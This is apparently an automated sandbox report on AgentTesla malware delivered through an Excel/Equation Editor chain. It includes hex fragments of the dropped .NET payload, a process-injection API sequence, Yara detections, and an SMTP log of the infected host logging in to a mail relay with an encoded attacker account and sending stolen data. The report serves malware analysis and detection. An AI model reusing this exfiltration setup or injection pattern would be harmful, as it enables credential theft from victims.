Jan 27, 2021 09:15:46.847202063 CET	8	IN	Data Raw: 96 00 00 0a 16 6f 98 00 00 0a 72 2b 06 00 70 6f 99 00 00 0a 28 9a 00 00 0a 7d 22 00 00 04 02 6f 45 00 00 06 02 7b 20 00 00 04 6f 96 00 00 0a 16 6f 98 00 00 0a 72 2b 06 00 70 6f 99 00 00 0a 28 9b 00 00 0a 6f 6d 00 00 0a 00 02 6f 47 00 00 06 02 7b Data Ascii: or+po(}"oE{ oor+po(omoG{ oorEpo(om+rOp(&'%(rypo((&({o{oo=rpom*A47
Jan 27, 2021 09:15:46.847240925 CET	10	IN	Data Raw: 65 00 00 0a 6f 5f 00 00 0a 00 02 6f 53 00 00 06 1f 0c 1f 73 73 52 00 00 0a 6f 53 00 00 0a 00 02 6f 53 00 00 06 72 2b 02 00 70 6f 54 00 00 0a 00 02 6f 53 00 00 06 1f 7a 1f 15 73 55 00 00 0a 6f 56 00 00 0a 00 02 6f 53 00 00 06 1f 3d 6f 57 00 00 0a Data Ascii: eo_oSssRoSoSr+poToSzsUoVoS=oWoSrpofoU sRoSoUrpoToUoooU sUoVoU<oWoW(oXoW(YoZoWo[
Jan 27, 2021 09:15:46.847280025 CET	11	IN	Data Raw: 00 00 06 6f 6a 00 00 0a 02 6f 61 00 00 06 6f 6b 00 00 0a 00 02 6f 63 00 00 06 6f 6a 00 00 0a 02 6f 65 00 00 06 6f 6b 00 00 0a 00 02 6f 63 00 00 06 20 b6 00 00 00 1f 28 73 52 00 00 0a 6f 53 00 00 0a 00 02 6f 63 00 00 06 72 cd 02 00 70 6f 54 00 00 Data Ascii: ojoaokocojoeokoc (sRoSocrpoToc '2sUoVocBoWocoloe(oXoe(YoZoeo[oerp"@As\o]oe(^o_oe s
Jan 27, 2021 09:15:46.847316027 CET	13	IN	Data Raw: 00 00 06 6f 8f 00 00 0a 72 0b 0c 00 70 28 93 00 00 0a 7d 33 00 00 04 02 72 61 0c 00 70 02 6f 61 00 00 06 6f 8f 00 00 0a 72 cd 0c 00 70 28 93 00 00 0a 7d 34 00 00 04 00 02 7b 32 00 00 04 6f 80 00 00 0a 00 02 7b 30 00 00 04 02 7b 33 00 00 04 6f 83 Data Ascii: orp(}3rapoaorp(}4{2o{0{3o{1{0o{1{2o&{2oo,-oY{2oorpo(om{2o{0{4o{1{0o{1
Jan 27, 2021 09:15:46.847368956 CET	14	IN	Data Raw: 19 8d 76 00 00 01 25 16 7e 36 00 00 04 a2 25 17 7e 37 00 00 04 a2 25 18 72 0b 0f 00 70 a2 a2 6f a5 00 00 0a 26 1f 17 8c 85 00 00 01 0a 2b 00 06 2a 00 13 30 03 00 43 00 00 00 00 00 00 00 02 28 41 00 00 0a 00 02 02 fe 06 86 00 00 06 73 42 00 00 0a Data Ascii: v%~6%~7%rpo&+0C(AsB(CsD}CsE}DsF}E(s01,{8+,{8oG(H*$%0sJousJow
Jan 27, 2021 09:15:46.847414970 CET	15	IN	Data Raw: 02 6f 7e 00 00 06 72 09 02 00 70 6f 54 00 00 0a 00 02 6f 7e 00 00 06 20 b0 00 00 00 1f 15 73 55 00 00 0a 6f 56 00 00 0a 00 02 6f 7e 00 00 06 1f 44 6f 57 00 00 0a 00 02 6f 7e 00 00 06 72 77 07 00 70 6f 66 00 00 0a 00 02 6f 80 00 00 06 17 6f 62 00 Data Ascii: o~rpoTo~ sUoVo~DoWo~rwpofoobo(codorp"dAs\o]o(eo_o\|sRoSor+poTozsUoVoCoWorpofo

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 27, 2021 09:17:19.568044901 CET	587	49166	208.91.199.225	192.168.2.22	220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 27, 2021 09:17:19.568444014 CET	49166	587	192.168.2.22	208.91.199.225	EHLO 980108
Jan 27, 2021 09:17:19.744249105 CET	587	49166	208.91.199.225	192.168.2.22	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Jan 27, 2021 09:17:19.746047974 CET	49166	587	192.168.2.22	208.91.199.225	AUTH login ZmFjdHVyYWNpb25AbWlnZXVsZXouY29t
Jan 27, 2021 09:17:19.922535896 CET	587	49166	208.91.199.225	192.168.2.22	334 UGFzc3dvcmQ6
Jan 27, 2021 09:17:20.101150990 CET	587	49166	208.91.199.225	192.168.2.22	235 2.7.0 Authentication successful
Jan 27, 2021 09:17:20.102175951 CET	49166	587	192.168.2.22	208.91.199.225	MAIL FROM:<facturacion@migeulez.com>
Jan 27, 2021 09:17:20.279299021 CET	587	49166	208.91.199.225	192.168.2.22	250 2.1.0 Ok
Jan 27, 2021 09:17:20.280035973 CET	49166	587	192.168.2.22	208.91.199.225	RCPT TO:<facturacion@migeulez.com>
Jan 27, 2021 09:17:20.464610100 CET	587	49166	208.91.199.225	192.168.2.22	250 2.1.5 Ok
Jan 27, 2021 09:17:20.465126038 CET	49166	587	192.168.2.22	208.91.199.225	DATA
Jan 27, 2021 09:17:20.641292095 CET	587	49166	208.91.199.225	192.168.2.22	354 End data with <CR><LF>.<CR><LF>
Jan 27, 2021 09:17:20.645859957 CET	49166	587	192.168.2.22	208.91.199.225	.
Jan 27, 2021 09:17:20.919286013 CET	587	49166	208.91.199.225	192.168.2.22	250 2.0.0 Ok: queued as 5E7F8182CBD
Jan 27, 2021 09:17:22.420790911 CET	587	49167	208.91.198.143	192.168.2.22	220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 27, 2021 09:17:22.421289921 CET	49167	587	192.168.2.22	208.91.198.143	EHLO 980108
Jan 27, 2021 09:17:22.594434023 CET	587	49167	208.91.198.143	192.168.2.22	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Jan 27, 2021 09:17:22.594854116 CET	49167	587	192.168.2.22	208.91.198.143	AUTH login ZmFjdHVyYWNpb25AbWlnZXVsZXouY29t
Jan 27, 2021 09:17:22.768768072 CET	587	49167	208.91.198.143	192.168.2.22	334 UGFzc3dvcmQ6
Jan 27, 2021 09:17:22.944883108 CET	587	49167	208.91.198.143	192.168.2.22	235 2.7.0 Authentication successful
Jan 27, 2021 09:17:22.945167065 CET	49167	587	192.168.2.22	208.91.198.143	MAIL FROM:<facturacion@migeulez.com>
Jan 27, 2021 09:17:23.119394064 CET	587	49167	208.91.198.143	192.168.2.22	250 2.1.0 Ok
Jan 27, 2021 09:17:23.119929075 CET	49167	587	192.168.2.22	208.91.198.143	RCPT TO:<facturacion@migeulez.com>
Jan 27, 2021 09:17:23.302701950 CET	587	49167	208.91.198.143	192.168.2.22	250 2.1.5 Ok
Jan 27, 2021 09:17:23.303127050 CET	49167	587	192.168.2.22	208.91.198.143	DATA
Jan 27, 2021 09:17:23.476356030 CET	587	49167	208.91.198.143	192.168.2.22	354 End data with <CR><LF>.<CR><LF>
Jan 27, 2021 09:17:24.103679895 CET	587	49167	208.91.198.143	192.168.2.22	250 2.0.0 Ok: queued as 375861C2266

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 532 Parent PID: 584

General

Start time:	09:14:49
Start date:	27/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13feb0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2520 Parent PID: 584

General

Start time:	09:15:09
Start date:	27/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2736 Parent PID: 2520

General

Start time:	09:15:12
Start date:	27/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xc20000
File size:	1073152 bytes
MD5 hash:	411FA0337649AD03B57D223E60680397
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2159922481.00000000023C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2836 Parent PID: 2736

General

Start time:	09:15:13
Start date:	27/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xc20000
File size:	1073152 bytes
MD5 hash:	411FA0337649AD03B57D223E60680397
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2736 Parent PID: 2520 vbc.exeCOMMON

Executed Functions

Function 00221BA0, Relevance: 5.2, Strings: 4, Instructions: 162COMMON

Download Yara Rule

Strings

`!*m, xrefs: 00221C76
Y!, xrefs: 00221BA8
`!*m, xrefs: 00221D01
`!*m, xrefs: 00221CF1

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID: Y!$`!*m$`!*m$`!*m
API String ID: 0-1224569930
Opcode ID: d46b7c9ac482de87cbf28660bd0636035e7b3743d0fdd07c71ad96411b9de073
Instruction ID: 419594ad24350089ed4d11e4ae55af7b216290cccc7c1be8fccb426189a2e758
Opcode Fuzzy Hash: d46b7c9ac482de87cbf28660bd0636035e7b3743d0fdd07c71ad96411b9de073
Instruction Fuzzy Hash: 4B61CF74E00218DFDB08DFE9D88499DBBB2FF89300F24806AE805AB365DB319951CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00222148, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2d6832becc2e9fb86739073f7d061239d1b569d4ff74cfb153c72bc5a79dbe
Instruction ID: 7f049467e13654e21dabf8e4b058063bfffcb638d0c1e29f819e05838a186ea0
Opcode Fuzzy Hash: 6a2d6832becc2e9fb86739073f7d061239d1b569d4ff74cfb153c72bc5a79dbe
Instruction Fuzzy Hash: 598147B0E10229EBCB04CFE9D5806EEBBF6BF88315F64C565D808AB314D7359946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00221E90, Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31936a57a28ee1657702b7c016ba3321e536f9ccefff9ec5bc673820f8c752d7
Instruction ID: c37a85da2c53fc80b524c7b9d343ed6e1c24381ceecbdb34c847bdf2a8ccae41
Opcode Fuzzy Hash: 31936a57a28ee1657702b7c016ba3321e536f9ccefff9ec5bc673820f8c752d7
Instruction Fuzzy Hash: C6815670E10229EBCF14CFE9D841AEEBBB6BF98314F54C469D418AB204EB315A55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0022B1D4, Relevance: 1.8, APIs: 1, Instructions: 326processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0022B4A7

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1bab9378add021090facff88a6c80bbb6392428b74390ddd5da55b24e7fb5e8c
Instruction ID: 75a81351c0a0994901947d582e0371daff60467b1eacb2a29c157805ced5c80c
Opcode Fuzzy Hash: 1bab9378add021090facff88a6c80bbb6392428b74390ddd5da55b24e7fb5e8c
Instruction Fuzzy Hash: 07C16670D1022D9FDB21CFA4C841BEEBBB1BF49304F0096AAD809B7250DB749A95CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0022B1E0, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0022B4A7

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ea894132227912fc4b2bf1a54399dfea42635ff3f0d678233edeed757b374cd4
Instruction ID: 110ab72575dc8cdb2c61ae4cc6c789c03eb056f52272c40f2c384dd4b92450ed
Opcode Fuzzy Hash: ea894132227912fc4b2bf1a54399dfea42635ff3f0d678233edeed757b374cd4
Instruction Fuzzy Hash: 05C15670D1022D9FDB21CFA4D841BEDBBB5BF49304F0096AAD809B7240DB749A95CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0022AE50, Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0022AF2B

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3b9efa2eea0313cb5b386a69094cd08ae2690ae2851d36598e950e12c252d386
Instruction ID: 9190d70de414fd846e3d3424964d3f73eb7c4662cb551743d16aef37989db535
Opcode Fuzzy Hash: 3b9efa2eea0313cb5b386a69094cd08ae2690ae2851d36598e950e12c252d386
Instruction Fuzzy Hash: 4A41B8B4D012589FCB00CFE9D984AEEBBF1BB49304F24942AE815B7210D379AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0022AE58, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0022AF2B

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 35a19f0416fb4d683e5685663c8ff5f417dca3c1bfbebacfb81ce985089d0cb7
Instruction ID: 69efeea4ecb10f17900a897930f174adb5faea3287d8e97f2b88731b44069f8a
Opcode Fuzzy Hash: 35a19f0416fb4d683e5685663c8ff5f417dca3c1bfbebacfb81ce985089d0cb7
Instruction Fuzzy Hash: FC41A8B5D012189FCB00CFA9D984AEEFBF5BB49304F24942AE814B7210D779AA55CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0022AFB0, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0022B062

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ef0e975a2f61f493c936a2d9cac83db0ca45e4dfeb95b60f2577d0c7bdd384ad
Instruction ID: 6dd3ca5502d714014306a10ecc4c713f95ae3d90cc3942c0106a25f240fe4eb9
Opcode Fuzzy Hash: ef0e975a2f61f493c936a2d9cac83db0ca45e4dfeb95b60f2577d0c7bdd384ad
Instruction Fuzzy Hash: BD41A6B8D002589BCF00CFE9E884AEEFBB5BB09310F14942AE814B7210D775AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0022AD38, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0022ADE2

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d8832611420154ec3efa2ad6115f7dfaf4eb4394e417c42487d156c3377795c8
Instruction ID: 52cee526a7e468176677132d88e70f27bb9d21ff6c0ca213160be12159800cf2
Opcode Fuzzy Hash: d8832611420154ec3efa2ad6115f7dfaf4eb4394e417c42487d156c3377795c8
Instruction Fuzzy Hash: 7331A8B8D002589FCF10CFE9E884ADEFBB5BB49310F14942AE814B7210D775A951CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0022AC10, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0022ACBF

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 70f7bf74bcd932de0455592e9631b6dd38530c75260ba839057a953b051069ff
Instruction ID: 6de33ac7b949670cecf86ab500b6c1062e8ef616fa640de19e5046c5d80d8f08
Opcode Fuzzy Hash: 70f7bf74bcd932de0455592e9631b6dd38530c75260ba839057a953b051069ff
Instruction Fuzzy Hash: 9E31BAB4D012589FCB10CFE9D884AEEFBF5BB49314F24842AE414B7210D778AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0022AB20, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0022AB9E

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6272373d4d1c199af65db758fe592552784329182d3841c9f24738df67423d2d
Instruction ID: ad96fc6ae011f2e5656e3da7d9c9ff9547736485fce32ec38e8fc2faa764a24f
Opcode Fuzzy Hash: 6272373d4d1c199af65db758fe592552784329182d3841c9f24738df67423d2d
Instruction Fuzzy Hash: B331CCB4D112189FCF10CFA9E884ADEFBB5AF49314F14982AE815B7300D774A941CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0013D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2159312796.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5aa2dbcf62e1ca65e98eb5a654f7993e2ea605ad273f04915808f45b782293
Instruction ID: ca15d656f9603b16e440dcff087ba4ce18b7037373494b38b51e211c1564cfb2
Opcode Fuzzy Hash: 9a5aa2dbcf62e1ca65e98eb5a654f7993e2ea605ad273f04915808f45b782293
Instruction Fuzzy Hash: 4C21F275604344DFDB28CF64F884B16BB65EB84B14F34C9A9E84A4B346C33AD857CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0013D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2159312796.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba8138cfc5b38647068a1c2b42c80fd435ab124441ab4b8ddbdbd03d65f50ccf
Instruction ID: fb50fe871c04d81ac2afeea991571bfbe0ad771155a08a4a130eccbc262fac54
Opcode Fuzzy Hash: ba8138cfc5b38647068a1c2b42c80fd435ab124441ab4b8ddbdbd03d65f50ccf
Instruction Fuzzy Hash: 6B2183754083809FCB16CF14E994715BF71EF46714F28C5DAD8458F256C33AD856CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1C5, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2159289697.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f93fd50d866a76799ac6982d59bc9a24dbd16010aed36cf742f4b89ad831852d
Instruction ID: cff787a2f01fd0553656e21a5c4bc49b2a62571bb1ee0dffdadd7ec31e68e799
Opcode Fuzzy Hash: f93fd50d866a76799ac6982d59bc9a24dbd16010aed36cf742f4b89ad831852d
Instruction Fuzzy Hash: 6401A731004364DAE7208A95F888BA7FB9CEF51724F18C55AEE445B282C775D851C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1C4, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2159289697.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e77e0addffe66587b494be8f5b4afe83a202a2e53ace9a0a18290213ef343ee
Instruction ID: 2e42cf1d1088ab6d0868f1e1d5c9efcf625d58c41e1a3eb4b1f21febf8d36cfe
Opcode Fuzzy Hash: 0e77e0addffe66587b494be8f5b4afe83a202a2e53ace9a0a18290213ef343ee
Instruction Fuzzy Hash: EBF06D71404354AEEB108E56E888B66FF9CEB91724F28C55AED485F286C379AC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00223AA7, Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

4BF, xrefs: 00223B33
@2*m, xrefs: 00223CBC

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID: 4BF$@2*m
API String ID: 0-3135389189
Opcode ID: b541b09fb15df8d74b8950be690a76d45270e0640f28c2f89380745ad181c30c
Instruction ID: 4b78506998941f9c0274f7749af7f1b1a61401804368129b45e67f53194eb2d1
Opcode Fuzzy Hash: b541b09fb15df8d74b8950be690a76d45270e0640f28c2f89380745ad181c30c
Instruction Fuzzy Hash: AB518070910219CFD748EFF9E891ADE7BF6EB88304F00C939D004AB265EB745A469B91

Uniqueness

Uniqueness Score: -1.00%

Function 00223AB8, Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

4BF, xrefs: 00223B33
@2*m, xrefs: 00223CBC

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID: 4BF$@2*m
API String ID: 0-3135389189
Opcode ID: 3f4491a5f4169681ccf9d9edcf91ed3b0d65814c4216974220b70bd25afc4afc
Instruction ID: 8445219ea86201f772f5b5e8b0e09ff4a85e693c97ca266e4ad9f77f41aeee53
Opcode Fuzzy Hash: 3f4491a5f4169681ccf9d9edcf91ed3b0d65814c4216974220b70bd25afc4afc
Instruction Fuzzy Hash: 63518270910219CFD748EFF9E891A9E7BF7EB88304F00C935D004AB765EB745A468B91

Uniqueness

Uniqueness Score: -1.00%

Function 0022D167, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afe917216428556d33458e6777d95f4add05abbea05fdb3d7edaa9b7e265bc5
Instruction ID: e450170595f406224c2d268d0a486d83eb7c1d8d11a58fcc20e8439edd08c979
Opcode Fuzzy Hash: 2afe917216428556d33458e6777d95f4add05abbea05fdb3d7edaa9b7e265bc5
Instruction Fuzzy Hash: 17119E30C10229DFDB14CFA4D4587FEBBF0AF0A311F149469D455B7291CB748A58DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0022D178, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2159360569.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72870acfdaa028220446bc577799d447480e41a627187dff60f42621e03b22a
Instruction ID: 62f09b63751975d11210d5a0afb6da9b54fe8d0d55ea520a63d449458170bb6c
Opcode Fuzzy Hash: e72870acfdaa028220446bc577799d447480e41a627187dff60f42621e03b22a
Instruction Fuzzy Hash: 93117C30D14229DFDB14CFA5D8187EEBAF1AF4E301F249069D415B3291C7788954DB68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2836 Parent PID: 2736 vbc.exeCOMMON

Executed Functions

Function 00701DD0, Relevance: 2.9, Instructions: 2893COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 953d860ead5b2c7cc9e17db2308ebc695b21a2e3f8bf29fec1809fe7f78b1ba8
Instruction ID: 82eee4cc0eb298ab858bdb44a0bce569d26e5eabfff80b4c26f09e4a2152e795
Opcode Fuzzy Hash: 953d860ead5b2c7cc9e17db2308ebc695b21a2e3f8bf29fec1809fe7f78b1ba8
Instruction Fuzzy Hash: 1263FA71D1061ACECB11EF68C844A99F7B1FF95300F11C79AE548AB261EB74AAD4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0070E890, Relevance: 2.9, Strings: 2, Instructions: 391COMMON

Download Yara Rule

Strings

d7S, xrefs: 0070EBB6
6S, xrefs: 0070E9D5

Memory Dump Source

Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID: d7S$6S
API String ID: 0-3219380434
Opcode ID: d3737bfd876dcd2b0de2d3a475526d88fabc97b44180c54215007aa82786fd02
Instruction ID: 3ed1a636ebbf515e905e004f8ac4200e079f78598f0ee1a9299ceecbe5160604
Opcode Fuzzy Hash: d3737bfd876dcd2b0de2d3a475526d88fabc97b44180c54215007aa82786fd02
Instruction Fuzzy Hash: 9AD1D130B002049FDB28EBB4C8557AE76E7EFC9744F148928E01A9B3D5DF74AD468B91

Uniqueness

Uniqueness Score: -1.00%

Function 00705288, Relevance: 2.4, Instructions: 2370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e229cd90328d2a6925bbc3a9a1817fce258a0968ec2dfd8d86dbc23c3ad2423f
Instruction ID: 2ee3cbc2f5a1e98446d7ef6645dd9a5a1cd6e2ac2958c5a1cf7c56496d3f7345
Opcode Fuzzy Hash: e229cd90328d2a6925bbc3a9a1817fce258a0968ec2dfd8d86dbc23c3ad2423f
Instruction Fuzzy Hash: E5333A70E006598FCB14EF68C884A9DF7F5BF99300F15C69AD548AB261EB70AAC5CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00844F5F, Relevance: 1.6, Instructions: 1557COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2370742887.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d6ac79b29f6a35e1ad663e6c179e612d9dfa810a05269154c7b2fa6f0b73708
Instruction ID: c92e03e5a85b4581900dc0bad900d8a72181743a82a52ac7b497e57715b71b9b
Opcode Fuzzy Hash: 8d6ac79b29f6a35e1ad663e6c179e612d9dfa810a05269154c7b2fa6f0b73708
Instruction Fuzzy Hash: 0F92A174B00A089FEB20CB28C894B6DB7A2FF45720F25855AE546DF7A2CB75EC41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00700048, Relevance: 1.1, Instructions: 1102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e24f035a1b65861d40e79c2430a11484995ee6267bc20bf6001427c9aed6f3a
Instruction ID: ecb91c996ea9a84681b18fa31baa8109dca8afd6410076f5df6356e8ee99fa95
Opcode Fuzzy Hash: 5e24f035a1b65861d40e79c2430a11484995ee6267bc20bf6001427c9aed6f3a
